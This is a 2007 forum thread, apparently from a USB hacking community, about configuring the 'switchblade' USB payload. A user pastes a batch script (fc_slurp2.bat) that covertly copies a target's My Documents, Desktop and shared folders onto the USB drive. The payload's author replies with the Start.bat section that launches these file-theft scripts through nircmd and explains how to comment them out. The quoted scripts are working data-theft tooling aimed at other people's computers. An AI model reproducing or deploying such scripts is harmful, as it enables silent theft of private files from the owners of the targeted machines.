Nameless Posted July 8, 2007 Share Posted July 8, 2007 How would I go about disabling the slurp commands in my switchblade. This the code for fc_slurp2. bat :: These first two commands copy the entire contents of the current users My Documents and Desktop folders :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o :: These last two commands copy the entire contents of the Shared Documents and All Users Desktop folders :: All Users Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataSharedDesktop fc.exe "C:Documents and SettingsAll UsersDesktop*" "....Documentslogfiles%computername%Slurp_DataSharedDesktop*" /i /o :: All Users Documents files mkdir ....Documentslogfiles%computername%Slurp_DataSharedDocuments fc.exe "C:Documents and SettingsAll UsersShared Documents*" "....Documentslogfiles%computername%Slurp_DataSharedDocuments*" /i /o I am using the pocketknife payload. Thanks for the help. Quote Link to comment Share on other sites More sharing options...
Sparda Posted July 8, 2007 Share Posted July 8, 2007 Comment them out? Quote Link to comment Share on other sites More sharing options...
Nameless Posted July 8, 2007 Author Share Posted July 8, 2007 yeah, I want to stop them from running Quote Link to comment Share on other sites More sharing options...
Leapo Posted July 9, 2007 Share Posted July 9, 2007 Ok, we have a few things to go over here. When you "comment something out", you're telling the computer to ignore a specific command and continue down to the next thing that isn't commented out. You'll probably notice all of my batch file comments have a "::" before them, this is so my comments aren't read when my code is executed. You can also use :: to disable certain aspects of my batch files by simply adding :: in front of the code you want disabled. You may also want to go back and throughly read the included readme, as it appears you may have skipped a bit. For my payload, when you want to disable something, you don't need to edit the individual batch files; everything is controlled from within Start.bat (which is also fully commented). Navigate to WIPCMD and edit Start.bat by commenting out the lines that start fc_slurp and fc_slurp2.bat. Here's what the section of Start.bad pertaining to file slurping should look like after you've commented out the entires: :: Slurps smaller files like logs, chat logs, bookmarks, etc from the target. This component :: of slurp should be safe to run on smaller storage devices and flash drives, because it :: shouldn't need to copy anything larger than a log file. :: :: In any case, keep in mind it'll probably take a while to copy over everything (a few minutes). ::nircmd execmd CALL .fc_slurp.bat :: Slurps everything in the My Documents, Shared Cocuments, and the desktop (includes sub-folders). :: This second components of slurp will most likely copy a LOT of large files to the switchblade. :: :: This is turned on by default, but you might want to disable this if you're not running from a :: decently large storage device (like an external hard disk). :: :: In any case, keep in mind it'll probably take a while to copy over everything (depending on what :: the target has stored in their My Documents folder). ::nircmd execmd CALL .fc_slurp2.bat As simple as that, all I did was add a :: to the lines that started the batch files. Quote Link to comment Share on other sites More sharing options...
Nameless Posted July 10, 2007 Author Share Posted July 10, 2007 thanks man, that explain a lot. I'm trying to learn as much about this stuff as i can. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.